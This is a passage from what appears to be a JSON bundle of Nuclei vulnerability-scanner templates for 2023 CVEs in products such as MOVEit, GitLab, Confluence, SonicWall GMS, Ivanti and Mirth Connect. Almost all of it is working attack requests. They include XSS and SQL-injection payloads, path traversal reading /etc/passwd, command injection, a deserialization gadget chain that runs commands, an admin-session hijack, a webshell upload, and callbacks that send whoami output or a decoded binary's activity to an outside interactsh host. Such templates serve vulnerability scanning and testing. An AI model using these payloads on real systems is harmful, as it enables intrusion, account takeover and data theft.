application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&s_mod=login\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"Set-Cookie\")","status_code == 302"],"condition":"and"}]},{"raw":["POST /admin/language_edit.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nlang=en&module=help&lang_file={{lang-file}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(response, \"_csrf_id\", \"_csrf_key\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"lang_file_location","group":1,"regex":["<legend>Language file: (.*)</legend>"],"internal":true},{"type":"regex","name":"csrf_id","group":1,"regex":["_csrf_id\" value=\"(.*)\" />"],"internal":true},{"type":"regex","name":"csrf_key","group":1,"regex":["_csrf_key\" value=\"(.*)\" />"],"internal":true}]},{"raw":["POST /admin/language_edit.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlang=en&module=help&lang_file={{lang-file}}&_csrf_id={{csrf_id}}&_csrf_key={{csrf_key}}&records[%5C]={{payload-url-enc}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200"]}]},{"raw":["GET /admin/{{websh-file}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nC: {{base64('\u00a7echo-cmd\u00a7')}}\n"],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","words":["{{echo-cmd-hash}}"]}]},{"raw":["GET /admin/{{websh-file}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nC: {{base64('rm \u00a7lang_file_location\u00a7')}}\n"],"matchers":[{"type":"status","status":[200]}]},{"raw":["GET /admin/{{websh-file}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nC: {{base64('rm \u00a7websh-file\u00a7')}}\n"],"matchers":[{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2122","info":{"name":"Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=iowd_settings&msg=1&iowd_tabs_active=generalry8uo%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ef0cmo HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<img src=a onerror=alert(document.domain)>\")","contains(body_2, \"Image optimizer\")"],"condition":"and"}]}]},{"id":"CVE-2023-7028","info":{"name":"GitLab - Account Takeover via Password Reset","severity":"high"},"requests":[{"raw":["GET /users/sign_in HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"token","group":1,"regex":["name=\"authenticity_token\" value=\"([A-Za-z0-9_-]+)\""],"internal":true}]},{"raw":["@timeout: 20s\nPOST /users/password HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/users/password/new\n\nauthenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}\n"],"payloads":{"username":["admin@example.com","admin@{{RDN}}","root@{{RDN}}","gitlab@{{RDN}}","git@{{RDN}}"]},"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'smtp')"]}],"extractors":[{"type":"dsl","dsl":["username"]}]}]},{"id":"CVE-2023-33629","info":{"name":"H3C Magic R300-2100M - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /goform/aspForm HTTP/1.1\nHost: {{Hostname}}\n\nCMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp&param=1; $(ls>/www/{{filename}});\n","GET /{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","contains(body_1, 'do_cmd.asp')","status_code_2 == 200","contains_all(body_2, 'www', 'www_multi')"],"condition":"and"}]}]},{"id":"CVE-2023-22518","info":{"name":"Atlassian Confluence Server - Improper Authorization","severity":"critical"},"requests":[{"raw":["POST /json/setup-restore.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7\nX-Atlassian-Token: no-check\n\n------WebKitFormBoundaryT3yekvo0rGaL9QR7\nContent-Disposition: form-data; name=\"buildIndex\"\n\nfalse\n------WebKitFormBoundaryT3yekvo0rGaL9QR7\nContent-Disposition: form-data; name=\"file\";filename=\"{{randstr}}.zip\"\n\n{{randstr}}\n------WebKitFormBoundaryT3yekvo0rGaL9QR7\nContent-Disposition: form-data; name=\"edit\"\n\nUpload and import\n------WebKitFormBoundaryT3yekvo0rGaL9QR7--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')"],"condition":"and"}]}]},{"id":"CVE-2023-30210","info":{"name":"OURPHP <= 7.2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_tz.php?act=rt&callback=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","barmemCachedPercent","swapPercent"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2779","info":{"name":"Super Socializer < 7.13.52 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://oast.pro HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<img src=x onerror=alert(document.domain)>\") && contains(body_2, \"facebook_urls\")"],"condition":"and"}]}]},{"id":"CVE-2023-4173","info":{"name":"mooSocial 3.1.8 - Reflected XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/classified/%22%3E%3Cimg%20src=a%20onerror=alert('document.domain')%3E/search?category=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert('document.domain')>","mooSocial"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-34362","info":{"name":"MOVEit Transfer - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nCookie: siLockLongTermInstID=0\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyUsername: Guest\nX-siLock-SessVar1: MyPkgAccessCode: 123\nX-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@oast.me\nCookie: siLockLongTermInstID=0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: siLockLongTermInstID=0\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nArg06=123\n","@Host: https://checkip.amazonaws.com\nGET / HTTP/1.1\nHost: checkip.amazonaws.com\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nAccept: */*\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyPkgID: 0\nX-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('{{sessioncookie}}');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET InstId='1234' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET IpAddress='{{ips}}' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET Timeout='60' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET ResilNode='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET AcctReady='1' WHERE SessionID='{{sessioncookie}}'; -- asdf\nCookie: siLockLongTermInstID=0\nContent-Length: 0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0\nContent-Type: application/x-www-form-urlencoded\n\nCsrfToken={{csrf}}&transaction=secmsgpost&Arg01=email_subject&Arg04=email_body&Arg06=123&Arg05=send&Arg08=email%40oast.me&Arg09=attachment_list\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{sessioncookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_7","words":["{\"access_token\":"]},{"type":"word","part":"header_7","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ips","regex":["\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b"],"internal":true},{"type":"regex","name":"csrf","group":1,"regex":["name=\"csrftoken\" value=\"(\\w+)\">"],"internal":true,"part":"body"},{"type":"regex","name":"access_token","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body"}]}]},{"id":"CVE-2023-2949","info":{"name":"OpenEMR < 7.0.1 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/interface/forms/eye_mag/js/eye_base.php?providerID=%3Cimg%20src=x%20onerror=alert(document.domain);%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"<img src=x onerror=alert(document.domain);>\", \"openemr\")"],"condition":"and"}]}]},{"id":"CVE-2023-33439","info":{"name":"Faculty Evaluation System v1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=login HTTP/1.1\nHost:{{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nemail={{username}}&password={{password}}&login=1\n","GET /admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1\nHost:{{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Fatal error:\")","contains(body, \"XPATH syntax error:\")"],"condition":"and"}]}]},{"id":"CVE-2023-4568","info":{"name":"PaperCut NG Unauthenticated XMLRPC Functionality","severity":"medium"},"requests":[{"raw":["POST /rpc/clients/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nContent-Type:text/xml\n\n<?xml version=\"1.0\"?><methodCall><methodName>client.getGlobalConfig</methodName><params><param><value><string>str1</string></value></param><param><value><string>str2</string></value></param></params></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["conf.ssl-port","conf.auth-ttl-default"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-31465","info":{"name":"TimeKeeper by FSMLabs - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).{{interactsh-url}}%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22{{Hostname}}%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"seriesID\":"]}]}]},{"id":"CVE-2023-32563","info":{"name":"Ivanti Avalanche - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /Servlet/Skins HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 333\nContent-Type: multipart/form-data; boundary=------------------------eacf31f23ac1829f\nConnection: close\n\n--------------------------eacf31f23ac1829f\nContent-Disposition: form-data; name=\"guid\"\n\n../../../Web/webapps/ROOT\n--------------------------eacf31f23ac1829f\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\n\n<%\nout.println(\"CVE-2023-32563\");\n%>\n--------------------------eacf31f23ac1829f--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["CVE-2023-32563"]}]}]},{"id":"CVE-2023-43208","info":{"name":"NextGen Healthcare Mirth Connect - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/server/version HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\n","POST /api/users HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\nContent-Type: application/xml\n\n<sorted-set>\n  <string>abcd</string>\n  <dynamic-proxy>\n    <interface>java.lang.Comparable</interface>\n    <handler class=\"org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler\">\n      <target class=\"org.apache.commons.collections4.functors.ChainedTransformer\">\n        <iTransformers>\n          <org.apache.commons.collections4.functors.ConstantTransformer>\n            <iConstant class=\"java-class\">java.lang.Runtime</iConstant>\n          </org.apache.commons.collections4.functors.ConstantTransformer>\n          <org.apache.commons.collections4.functors.InvokerTransformer>\n            <iMethodName>getMethod</iMethodName>\n            <iParamTypes>\n              <java-class>java.lang.String</java-class>\n              <java-class>[Ljava.lang.Class;</java-class>\n            </iParamTypes>\n            <iArgs>\n              <string>getRuntime</string>\n              <java-class-array/>\n            </iArgs>\n          </org.apache.commons.collections4.functors.InvokerTransformer>\n          <org.apache.commons.collections4.functors.InvokerTransformer>\n            <iMethodName>invoke</iMethodName>\n            <iParamTypes>\n              <java-class>java.lang.Object</java-class>\n              <java-class>[Ljava.lang.Object;</java-class>\n            </iParamTypes>\n            <iArgs>\n              <null/>\n              <object-array/>\n            </iArgs>\n          </org.apache.commons.collections4.functors.InvokerTransformer>\n          <org.apache.commons.collections4.functors.InvokerTransformer>\n            <iMethodName>exec</iMethodName>\n            <iParamTypes>\n              <java-class>java.lang.String</java-class>\n            </iParamTypes>\n            <iArgs>\n              <string>nslookup {{interactsh-url}}</string>\n            </iArgs>\n          </org.apache.commons.collections4.functors.InvokerTransformer>\n        </iTransformers>\n      </target>\n      <methodName>transform</methodName>\n      <eventTypes>\n        <string>compareTo</string>\n      </eventTypes>\n    </handler>\n  </dynamic-proxy>\n</sorted-set>\n"],"matchers":[{"type":"dsl","dsl":["compare_versions(version, \"<4.4.1\")","contains(interactsh_protocol, \"dns\")","status_code_1 == 200 && status_code_2 == 500"],"condition":"and"}],"extractors":[{"type":"regex","part":"body_1","name":"version","group":1,"regex":["(.*)"],"internal":true}]}]},{"id":"CVE-2023-39796","info":{"name":"WBCE 1.6.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /modules/miniform/ajax_delete_message.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code_1 == 200","contains(body, \"Record deleted successfully!\")"],"condition":"and"}]}]},{"id":"CVE-2023-6065","info":{"name":"Quttera Web Malware Scanner <= 3.4.1.48 - Sensitive Data Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/quttera-web-malware-scanner/quttera_wp_report.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Website Malware Scan Report","Scanned Website","Scan type"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-40504","info":{"name":"LG Simple Editor <= v3.21.0 - Command Injection","severity":"critical"},"requests":[{"raw":["GET /simpleeditor/common/commonReleaseNotes.do HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"LG Simple Editor\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /simpleeditor/imageManager/uploadVideo.do HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadVideo\"; filename=\"{{filename}}.bmp\"\n\n/\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadPath\"\n\n/\"&cmd&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del {{filename}}.bmp&/../\"\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadFile_x\"\n\n1\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadFile_width\"\n\n1\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadFile_height\"\n\n1\n------WebKitFormBoundary7MA4YWxkTrZu0gW--\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"errorCode\",\"errorMessage\",\"fail\")","contains(content_type, \"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /simpleeditor/fileSystem/makeDetailContent.do HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept: application/json\n\n{\"command\":\"cp\",\"option\":\"-f\",\"srcPath\":\"/{{filename}}_original.bmp\",\"destPath\":\"/{{filename}}.jsp\"}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"errorCode\",\"errorMessage\",\"data\",\"success\")","contains(content_type, \"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /simpleeditor/{{filename}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-44813","info":{"name":"mooSocial v.3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/friends/ajax_invite?mode=model%27)%3balert(document.domain)%2f%2f;'"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["initInviteFriendBtn('model');alert(document.domain)//;"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34259","info":{"name":"Kyocera TASKalfa printer - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"word","part":"server","words":["KM-MFP"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26347","info":{"name":"Adobe Coldfusion - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wddxPacket version=","<string>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39600","info":{"name":"IceWarp 11.4.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=\"><img src=x onerror=confirm(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img src=x onerror=confirm(document.domain)>","IceWarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6567","info":{"name":"LearnPress <= 4.2.5.7 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 20s\nGET /wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains_all(header, \"lp_session_guest=\", \"application/json\")","contains_all(body, \"status\\\":\\\"success\", \"No courses were found\")"],"condition":"and"}]}]},{"id":"CVE-2023-6021","info":{"name":"Ray API - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nodes?view=summary","{{BaseURL}}/api/v0/logs/file?node_id={{nodeid}}&filename=../../../../../etc%2fpasswd&lines=50000"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_2","regex":["root:.*:0:0:"]},{"type":"word","part":"header_2","words":["text/plain","aiohttp"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","part":"body","internal":true,"name":"nodeid","json":["..|objects|.nodeId//empty[0]"]}]}]},{"id":"CVE-2023-34192","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"critical"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=preferred\n","GET /h/autoSaveDraft?draftid=aaaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cbbbbbbbb HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>","zimbra"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","part":"header_2","status":[200]}]}]},{"id":"CVE-2023-5556","info":{"name":"Structurizr on-premises - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /signin HTTP/1.1\nHost: {{Hostname}}\n","POST /login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&_csrf={{csrf}}&hash=\n","GET /dashboard HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /workspace/create HTTP/1.1\nHost: {{Hostname}}\n","GET /workspace/{{workspace}}/?version={{str}}%22);alert(document.domain);// HTTP/1.1\nHost: {{Hostname}}\n"],"attack":"pitchfork","payloads":{"username":["structurizr"],"password":["password"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["<a href=\"/dashboard\">","Sign out"],"condition":"and"},{"type":"word","part":"body_5","words":["\");alert(document.domain);//","Structurizr"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"([0-9a-z-]+)\""],"internal":true},{"type":"regex","name":"workspace","group":1,"part":"header","regex":["\\/workspace\\/([0-9]+)\\?scriptNonce="],"internal":true}]}]},{"id":"CVE-2023-35161","info":{"name":"XWiki >= 6.2-milestone-1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)","{{BaseURL}}/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert(document.domain)","DeleteApplication","data-xwiki"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-0777","info":{"name":"modoboa  2.0.4 - Admin TakeOver","severity":"critical"},"requests":[{"raw":["GET /accounts/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /accounts/login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrfmiddlewaretoken={{csrftoken}}&username={{username}}&password={{password}}&next=%2F\n","GET /dashboard/ HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"username":["admin"],"password":["password"]},"attack":"pitchfork","host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"Dashboard\") && contains(body_3, \"Hello admin\")"],"condition":"and"}],"extractors":[{"type":"regex","part":"header","name":"csrftoken","internal":true,"group":1,"regex":["csrftoken=([A-Za-z0-9]+)"]}]}]},{"id":"CVE-2023-34124","info":{"name":"SonicWall GMS and Analytics Web Services - Shell Injection","severity":"critical"},"requests":[{"raw":["GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1\nHost: {{Hostname}}\nAuth: {\"user\": \"system\", \"hash\": \"{{base64(hex_decode(auth))}}\"}\n","GET /appliance/login HTTP/1.1\nHost: {{Hostname}}\n","POST /appliance/applianceMainPage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,\"^.*:\",\"\"))) }}&password={{replace_regex(alias,\"^.*:\",\"\")}}&applianceUser={{replace_regex(alias,\":.*$\",\"\")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0\n","POST /appliance/applianceMainPage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnum=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\\$\\(echo\\+-e\\+begin-base64\\+755\\+a\\\\\\\\nKwee\\\\\\\\n\\%3d\\%3d\\%3d\\%3d\\+\\|\\+uudecode\\+-o-\\)\\%3becho\\+-e\\+begin-base64\\+755\\+/tmp/.{{filename}}\\\\\\\\n{{replace(base64(callback),\"+\",\"${PLUS}\")}}\\\\\\\\n\\%3d\\%3d\\%3d\\%3d\\+|+uudecode+%3b/tmp/.{{filename}}%3brm+/tmp/.{{filename}}%3becho+\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["<title>SonicWall Universal Management Appliance</title>","<title>SonicWall Universal Management Host</title>"],"condition":"or"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"json","part":"body","internal":true,"name":"alias","group":1,"json":[".alias"]},{"type":"regex","part":"body","internal":true,"name":"servertoken","group":1,"regex":["getPwdHash.*,'([0-9]+)'"]}]}]},{"id":"CVE-2023-46805","info":{"name":"Ivanti ICS - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1\nHost: {{Hostname}}\n","GET /api/v1/cav/client/status/../../admin/options HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"build\")","contains(body_1, \"system-information\")","contains(body_1, \"software-inventory\")","contains(header_1, \"application/json\")"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"poll_interval\")","contains(body_2, \"block_message\")","contains(header_2, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2023-30212","info":{"name":"OURPHP <= 7.2.0 -  Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location.href='../..</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-45852","info":{"name":"Viessmann Vitogate 300 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/vitogate.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"method\":\"put\",\"form\":\"form-4-8\",\"session\":\"\",\"params\":{\"ipaddr\":\"{{randstr}};cat /etc/passwd\"}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(header, \"application/json\")","contains_all(body, \"traceroute: {{randstr}}: Unknown host\", \"daemon:x:1:1:\")"],"condition":"and"}]}]},{"id":"CVE-2023-6020","info":{"name":"Ray Static File - Local File 